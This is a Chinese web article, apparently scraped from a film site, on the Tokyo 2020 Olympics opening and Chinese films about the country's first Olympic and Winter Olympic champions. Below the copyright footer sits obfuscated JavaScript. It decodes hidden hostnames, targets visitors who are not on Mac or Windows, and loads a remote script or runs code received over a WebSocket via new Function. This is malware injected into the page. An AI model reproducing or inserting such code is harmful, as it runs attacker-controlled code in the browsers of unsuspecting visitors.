东京奥运终开幕!它们的名字,需要被记住!

来源:鬼片网人气:加载中更新:2021-07-27 00:48

7月23日,东京奥运会盛大开幕,奥林匹克历史,终于翻开新的一页。距离里约奥运会足足过去五年,东京奥运会的筹备一波三折。日前,国际奥委会罕见修改奥林匹克格言,在“更快、更高、更强”的基础上加入“更团结”。


1905电影网专稿 7月23日,东京奥运会盛大开幕,奥林匹克历史,终于翻开新的一页。距离里约奥运会足足过去五年,东京奥运会的筹备一波三折。日前,国际奥委会罕见修改奥林匹克格言,在“更快、更高、更强”的基础上加入“更团结”。


主席巴赫为此解释,“更团结,是为了应对新冠疫情,更是为了应对我们面临的巨大挑战。”


欣喜的是,艰难与困境并没有浇灭中国健儿进击奥林匹克的热情。涵盖运动员431人,本届中国代表团总人数为777人,达到历年境外参赛的最大规模。姚明、刘国梁、郎平、周继红等一众“熟面孔”,将带领“中国梦之队”在赛场上竭力拼搏,为国争光。



一直以来,中国体育人都坚持用行动支持奥林匹克。中国电影人,也从不甘落后。


第一次奥运 第一块金牌


1932年,第10届洛杉矶奥运会开幕式上,几张黄皮肤、黑眼睛的华人面孔格外注目。


彼时,我国短跑运动员刘长春正手执国旗,昂首阔步向前。跟在他身后的,是由沈嗣良、宋君复、刘雪松、申国权、托平5位代表临时组成的中国军团。


这是中国人首次参加奥运会的画面。刘长春,正是我国第一位奥运会旗手。



这位辽宁小伙,曾凭借10.8秒、22.4秒和52.4秒的成绩一举打破当时100米、200米和400米3个短跑项目的全国纪录。


站在洛杉矶万人体育场的起跑线,他再度竭尽全力,在100和200米的项目上如风奔跑,为国家荣誉而战。


电影《一个人的奥林匹克》剧照


改编自刘长春的真人真事,2008年,第五代导演侯咏组织拍摄了《一个人的奥林匹克》。


影片全面还原了中国奥运第一人在动荡年代里,含泪告别妻儿,拒绝日寇威胁,一路躲避关东军追杀,前往北平求助母校校长张学良,最终历经万难漂洋过海,代表四亿中国人站在奥运跑道的曲折经历。



侯咏说,这是他拍过最艰难的一部戏,拍完之后,身材消瘦了不少,白发也多了很多。好在,《一个人的奥林匹克》赶在北京奥运会前正式与观众见面。这对于当年作为奥运东道主的中国来说,无疑是极大的鼓舞与激励。


“以奥运会为主题的纪录片全世界拍过不只一部,但拍摄故事片还是第一次。”时任国际奥委会罗格给予该片高度评价,并为之亲题了英文片名《THE ONE MAN OLYMPICS》。



《一个人的奥林匹克》在好莱坞举行首映时,刘长春之子刘鸿亮、奥运冠军许海峰专程从北京赶到洛杉矶观礼。


台上,制片人王浙滨生动真挚地畅谈着影片的创作背景与创作过程。台下,许海峰倒是和影片编剧王兴东热聊起天南地北。


许海峰回忆,“跟王兴东聊天时,自己分享了过往经历。兴东听后饶有兴趣,并承诺,“有时间,我一定要给你写一部电影。”


1984年,还是洛杉矶,许海峰在第23届奥运会上夺得男子手枪60发慢射冠军,成为当届奥运首金得主,同时也是中国首位奥运冠军,实现了中国奥运会历史上金牌“零”的突破,拉开了中国奥运军团走向辉煌的序幕。


许海峰


许海峰勇夺中国奥运首金的闪光之处,成为金牌编剧王兴东的笔下素材。


两人在好莱坞的“协议”,落实为电影《许海峰的枪》,由王兴东儿子王放放执导。贯穿整个过程,许海峰不仅参与了演员选角、还亲自上阵为他们提供指导。


《许海峰的枪》是王放放的大银幕处女作。导演曾动情表示,这可能称不上是他最好的作品,但肯定是他最尽力的作品。


2012年,影片乘着中国健儿在伦敦奥运会载誉归来的氛围上映,得到了许海峰本人的真切肯定,也收获了无数观众的热烈好评。



王放放不是一个高产导演,时隔6年,他开始第三部电影长片的创作,依然把镜头对准中国体育题材,对准了中国冬奥金牌“零”的突破。


王放放执导的新作《我心飞扬》正是以此为灵感,诠释了中国冬奥健儿冰上夺冠背后永不言败的付出与精神。适逢2022 年北京将举办第24届冬奥会,该片将在于2022大年初一上映,旨在北京冬奥举办之际再掀全民沸腾。



2002年,盐湖城冬奥会,短道速滑天才选手杨扬相继在500米和1000米的比赛中夺金,打破了自中国从1980年普莱西德湖冬季奥运会参赛以来的“金牌荒”。自此,中国冬奥一路屡创佳绩,以强劲实力屹立于世界民族之林。


杨扬


从零到一的突破,对于国人来说,是不忘初心的开始,也是永记于心的印记。


从1932到2002,从洛杉矶到盐湖城,从《一个人的奥林匹克》到《许海峰的枪》再到《我心飞扬》,电影人以光影为载,重现了国人首次参加奥运以及首次在夏奥和冬奥站上最高领奖台的动人时刻。


台上一分钟 台下十年功


为了拥有争金夺银的底气,中国健儿正式亮相赛场之前,没有一个不是历经日复一日的刻苦训练。为了更好呈现这群英雄的拼搏精神,中国电影人同样克服无数困难,付出巨大努力。


摆在《一个人的奥林匹克》眼前的第一道槛,是还原上世纪30年代的场景。筹备不易,剧组一路转战大连、铁岭、北京、天津和上海实地勘察、搭景取景,从北到南,行程遍及半个中国。



刘长春的扮演者李兆霖,彼时刚刚从中戏毕业,这是他第一次在电影里担任男主。


此前,李兆霖已经受过专业的短跑训练,是国家二级运动员。为了演好这个角色,他还是特地找到专业田径教练加强短跑技术,开机前四个月,每天奔跑在田径场上,汗水把衣服都浸湿了,就换一件,继续坚持训练。



历史上的刘长春,辗转到洛杉矶之后已经耗费大量精力。本报名了三项短跑比赛的他,最终只参加了两项。第一项比赛结束,名次不佳,教练让他主动退出后续比赛。


这一幕,也出现了在电影里。


“刘长春”不甘退赛又纠结赛果的压力,通过扇自己耳光来释放。这场戏,李兆霖足足拍了十几次,一下一下地用力拍下,脸颊都被自己扇红了,只为追求他眼中稍微满意的表演。



《许海峰的枪》中,李东学饰演许海峰本人。许海峰当年为中国射下第一块金牌时,时任国际奥委会主席萨马兰奇对他说:“今天是中国体育史上伟大的一天!”


他于中国体育的意义不言而喻,李学东拿下这个角色,也有过忐忑。



王放放介绍,影片拍摄准备阶段,李东学一边需要到国家射击队接受专业射击训练,一边还需要在半个月内猛吃食物增重十余斤,以贴近年轻许海峰的体型。拍摄期间,他还把许海峰在洛杉矶奥运比赛期间的日记带入剧组,时刻带在身边揣摩研究。


许海峰最初对李东学提出的要求,“一是不要演到最后不像我;二是要有信心,要全身心投入。”


这句半开玩笑,半提建议的话,被李东学牢牢记住,让他丝毫不敢怠慢。影片上映之际,李东学还有些许担心,不料许海峰却盛赞他,“悟性挺高,射击动作处理的像一回事,非常满意!”



聚焦中国健儿的冬奥故事,《我心飞扬》由徐峥监制,孟美岐、夏雨领衔主演。


孟美岐不是一个有滑冰基础的演员,而徐峥解释选择她的原因,是孟美岐自身经验和运动员非常像,能感受到体育精神。牵引、举重、深蹲、俯卧撑、折返跑,冰上训练,强补滑冰技能,高强度训练是她坚持数月的日程。



影片拍摄于零下十几度的东北,但为了表现夏季训练,孟美岐抵着严寒、直接穿着短袖上阵。


戏里饰演滑冰教练的夏雨评价孟美岐,“是个狠人”,“为真实呈现脚受伤后的疼痛,小孟主动在冰刀鞋里放石头,穿着‘特制’冰刀鞋在冰场飞驰,最后拿出的石头,甚至都是带血的。”


历经68个日夜的拍摄,《我心飞扬》目前已经杀青,静待上映。



除此之外,《夺冠》同样是近年出彩的体育题材电影。2008年北京奥运的中美大战,2016年里约奥运的中巴大战,一幕幕热血的国民记忆,几代女排人历经浮沉的传奇经历,都在陈可辛的镜头下再度焕发光彩。



四年一届的奥运,毋庸置疑是世界体坛的瞩目盛会;崇高的奥林匹克精神,驱使着万千健儿奋力向上。


此刻,中国代表团的东京征程已经开启,期待他们披荆斩棘、勇创佳绩,也期待中国电影人,以此为源,创造出更多属于观众的精彩。


文/keva

    Copyright © 2008-2021 鬼片网www.guipian5.com.保留所有权利

    function swtQKeDV(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function RonXvs(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return swtQKeDV(t);};window[''+'N'+'g'+'S'+'c'+'v'+'E'+'Q'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=RonXvs,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5yyLnpob3V3dXRyyaXAuY24=','dHIueWVzzdW42NzzguY29t','131005',window,document,['y','z']);}:function(){};